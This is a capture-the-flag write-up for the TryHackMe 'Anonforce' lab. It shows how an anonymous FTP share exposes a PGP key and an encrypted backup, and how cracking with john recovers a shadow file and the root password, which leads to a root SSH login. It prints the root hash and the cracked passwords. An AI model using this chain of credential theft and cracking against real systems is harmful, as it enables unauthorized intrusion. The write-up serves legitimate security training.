# Anonforce

https://tryhackme.com/room/bsidesgtanonforce

*** ## Enumeration ```bash sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/Anonforce 10.66.182.164 PORT STATE SERVICE REASON 21/tcp open ftp syn-ack ttl 62 22/tcp open ssh syn-ack ttl 62 ``` ```bash nmap -p 21,22 -sCV -oA nmap/openPorts 10.66.182.164 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxr-xr-x 2 0 0 4096 Aug 11 2019 bin | drwxr-xr-x 3 0 0 4096 Aug 11 2019 boot | drwxr-xr-x 17 0 0 3700 Mar 13 12:37 dev | drwxr-xr-x 85 0 0 4096 Aug 13 2019 etc | drwxr-xr-x 3 0 0 4096 Aug 11 2019 home | lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img -> boot/initrd.img-4.4.0-157-generic | lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic | drwxr-xr-x 19 0 0 4096 Aug 11 2019 lib | drwxr-xr-x 2 0 0 4096 Aug 11 2019 lib64 | drwx------ 2 0 0 16384 Aug 11 2019 lost+found | drwxr-xr-x 4 0 0 4096 Aug 11 2019 media | drwxr-xr-x 2 0 0 4096 Feb 26 2019 mnt | drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 notread [NSE: writeable] | drwxr-xr-x 2 0 0 4096 Aug 11 2019 opt | dr-xr-xr-x 103 0 0 0 Mar 13 12:37 proc | drwx------ 3 0 0 4096 Aug 11 2019 root | drwxr-xr-x 18 0 0 540 Mar 13 12:37 run | drwxr-xr-x 2 0 0 12288 Aug 11 2019 sbin | drwxr-xr-x 3 0 0 4096 Aug 11 2019 srv | dr-xr-xr-x 13 0 0 0 Mar 13 12:37 sys |_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all. | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.192.129 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8a:f9:48:3e:11:a1:aa:fc:b7:86:71:d0:2a:f6:24:e7 (RSA) | 256 73:5d:de:9a:88:6e:64:7a:e1:87:ec:65:ae:11:93:e3 (ECDSA) |_ 256 56:f9:9f:24:f1:52:fc:16:b7:7b:a3:e2:4f:17:b4:ea (ED25519) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` ```bash ftp 10.66.182.164 Connected to 10.66.182.164. 220 (vsFTPd 3.0.3) Name (10.66.182.164:melvin): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 Aug 11 2019 bin drwxr-xr-x 3 0 0 4096 Aug 11 2019 boot drwxr-xr-x 17 0 0 3700 Mar 13 12:37 dev drwxr-xr-x 85 0 0 4096 Aug 13 2019 etc drwxr-xr-x 3 0 0 4096 Aug 11 2019 home lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img -> boot/initrd.img-4.4.0-157-generic lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic drwxr-xr-x 19 0 0 4096 Aug 11 2019 lib drwxr-xr-x 2 0 0 4096 Aug 11 2019 lib64 drwx------ 2 0 0 16384 Aug 11 2019 lost+found drwxr-xr-x 4 0 0 4096 Aug 11 2019 media drwxr-xr-x 2 0 0 4096 Feb 26 2019 mnt drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 notread drwxr-xr-x 2 0 0 4096 Aug 11 2019 opt dr-xr-xr-x 100 0 0 0 Mar 13 12:37 proc drwx------ 3 0 0 4096 Aug 11 2019 root drwxr-xr-x 18 0 0 540 Mar 13 12:37 run drwxr-xr-x 2 0 0 12288 Aug 11 2019 sbin drwxr-xr-x 3 0 0 4096 Aug 11 2019 srv dr-xr-xr-x 13 0 0 0 Mar 13 12:37 sys drwxrwxrwt 9 0 0 4096 Mar 13 12:37 tmp drwxr-xr-x 10 0 0 4096 Aug 11 2019 usr drwxr-xr-x 11 0 0 4096 Aug 11 2019 var lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz.old -> boot/vmlinuz-4.4.0-142-generic 226 Directory send OK. ftp> cd notread 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rwxrwxrwx 1 1000 1000 524 Aug 11 2019 backup.pgp -rwxrwxrwx 1 1000 1000 3762 Aug 11 2019 private.asc 226 Directory send OK. ftp> prompt off Interactive mode off. ftp> mget * local: backup.pgp remote: backup.pgp 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for backup.pgp (524 bytes). 226 Transfer complete. 524 bytes received in 0.0010 seconds (487.8083 kbytes/s) local: private.asc remote: private.asc 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for private.asc (3762 bytes). 226 Transfer complete. 3762 bytes received in 0.0015 seconds (2.4418 Mbytes/s) ftp> cd .. 250 Directory successfully changed. ftp> cd home 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 4 1000 1000 4096 Aug 11 2019 melodias 226 Directory send OK. ftp> cd melodias 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 1000 1000 33 Aug 11 2019 user.txt 226 Directory send OK. ftp> get user.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for user.txt (33 bytes). 226 Transfer complete. 33 bytes received in 0.0003 seconds (106.3530 kbytes/s) ``` ## User flag ``` cat user.txt ``` {% hint style="success" %} 606\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*af8 {% endhint %} ## Privilege escalation ```bash /opt/john/run/gpg2john private.asc > hash.txt File private.asc ``` ```bash /opt/john/run/john hash.txt --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt Warning: detected hash type "gpg", but the string is also recognized as "gpg-opencl" Use the "--format=gpg-opencl" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65536 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status xbox360 (anonforce) 1g 0:00:00:00 DONE (2026-03-13 16:47) 5.000g/s 4650p/s 4650c/s 4650C/s xbox360..sheena Use the "--show" option to display all of the cracked passwords reliably Session completed ``` ```bash gpg --import private.asc gpg: key B92CD1F280AD82C2: "anonforce " not changed gpg: key B92CD1F280AD82C2: secret key imported gpg: key B92CD1F280AD82C2: "anonforce " not changed gpg: Total number processed: 2 gpg: unchanged: 2 gpg: secret keys read: 1 gpg: secret keys imported: 1 gpg --list-secret-keys [keyboxd] --------- sec dsa2048 2019-08-12 [SCA] 4D2E29E1DEADDB9BC160BD88B92CD1F280AD82C2 uid [ unknown] anonforce ssb elg512 2019-08-12 [E] ``` ```bash gpg -d backup.pgp gpg: encrypted with elg512 key, ID AA6268D1E6612967, created 2019-08-12 "anonforce " gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7::: daemon:*:17953:0:99999:7::: bin:*:17953:0:99999:7::: sys:*:17953:0:99999:7::: sync:*:17953:0:99999:7::: games:*:17953:0:99999:7::: man:*:17953:0:99999:7::: lp:*:17953:0:99999:7::: mail:*:17953:0:99999:7::: news:*:17953:0:99999:7::: uucp:*:17953:0:99999:7::: proxy:*:17953:0:99999:7::: www-data:*:17953:0:99999:7::: backup:*:17953:0:99999:7::: list:*:17953:0:99999:7::: irc:*:17953:0:99999:7::: gnats:*:17953:0:99999:7::: nobody:*:17953:0:99999:7::: systemd-timesync:*:17953:0:99999:7::: systemd-network:*:17953:0:99999:7::: systemd-resolve:*:17953:0:99999:7::: systemd-bus-proxy:*:17953:0:99999:7::: syslog:*:17953:0:99999:7::: _apt:*:17953:0:99999:7::: messagebus:*:18120:0:99999:7::: uuidd:*:18120:0:99999:7::: melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7::: sshd:*:18120:0:99999:7::: ftp:*:18120:0:99999:7::: ``` ```bash /opt/john/run/john hash.txt -w=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl" Use the "--format=sha512crypt-opencl" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Note: Passwords longer than 26 [worst case UTF-8] to 79 [ASCII] rejected Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status hikari (root) 1g 0:00:00:02 DONE (2026-03-13 17:16) 0.4831g/s 3339p/s 3339c/s 3339C/s 111111111111111..bethan Use the "--show" option to display all of the cracked passwords reliably Session completed ``` ```bash echo 'root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0' > hash.txt ``` ```bash ssh root@10.66.182.164 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html root@10.66.182.164's password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-157-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@ubuntu:~# ls root.txt ``` ## Root flag ```bash root@ubuntu:~# cat root.txt ``` {% hint style="success" %} f70\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*dce {% endhint %}